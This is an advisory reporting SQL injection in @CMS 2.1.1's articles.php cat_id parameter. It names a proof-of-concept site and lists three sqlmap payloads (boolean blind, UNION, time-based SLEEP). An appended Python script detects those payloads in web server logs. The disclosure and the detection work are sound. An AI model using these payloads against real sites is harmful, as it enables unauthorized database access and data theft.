CMS 2.1.1 SQL Injection

2014-08-26 / 2017-08-16
Credit: Renzi
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit: http://host/articles.php?cat_id=[SQLI]
# PoC: http://carla-coluXmna.de/articles.php?cat_id=[SQLI]

--- "SQLi using sqlmap."---

Place: GET
Parameter: cat_id

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo

    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs

---

# Thanks
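For defenders reviewing web server logs, the following added example (not part of the original advisory or of @CMS) flags requests to articles.php whose cat_id value is not a plain integer and labels them by the three technique families listed in the sqlmap output above. It assumes combined-format access logs and that legitimate cat_id values are decimal integers; the log lines, the shortened UNION value, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [22/Aug/2014:10:00:01 +0200] "GET /articles.php?cat_id=5 HTTP/1.1" 200 5120
198.51.100.9 - - [22/Aug/2014:10:00:05 +0200] "GET /articles.php?cat_id=5%27%20AND%206158%3D6158%20AND%20%27SEMo%27%3D%27SEMo HTTP/1.1" 200 5120
198.51.100.9 - - [22/Aug/2014:10:00:06 +0200] "GET /articles.php?cat_id=5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 HTTP/1.1" 200 812
198.51.100.9 - - [22/Aug/2014:10:00:12 +0200] "GET /articles.php?cat_id=5%27%20AND%20SLEEP%285%29%20AND%20%27XLrs%27%3D%27XLrs HTTP/1.1" 200 5120
203.0.113.4 - - [22/Aug/2014:10:01:00 +0200] "GET /index.php?page=2 HTTP/1.1" 200 2048
"""

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Checked in order: the time-based rule must precede the broader boolean rule.
RULES = [
    ("union", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-based", re.compile(r"'\s*(and|or)\b", re.I)),
]

def classify(value):
    """Return None for a plain integer id, otherwise a label for the value."""
    if re.fullmatch(r"\d+", value):
        return None
    for label, pattern in RULES:
        if pattern.search(value):
            return label
    return "non-numeric"  # assumption: ids are integers, so anything else is worth a look

def scan(log_text, script="/articles.php", param="cat_id"):
    """Return (client, label, decoded_value) for each suspicious request to script."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != script:
            continue
        # parse_qs percent-decodes the value, so encoded quotes and spaces are visible.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            label = classify(value)
            if label:
                findings.append((client, label, value))
    return findings

if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value!r}")
```
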

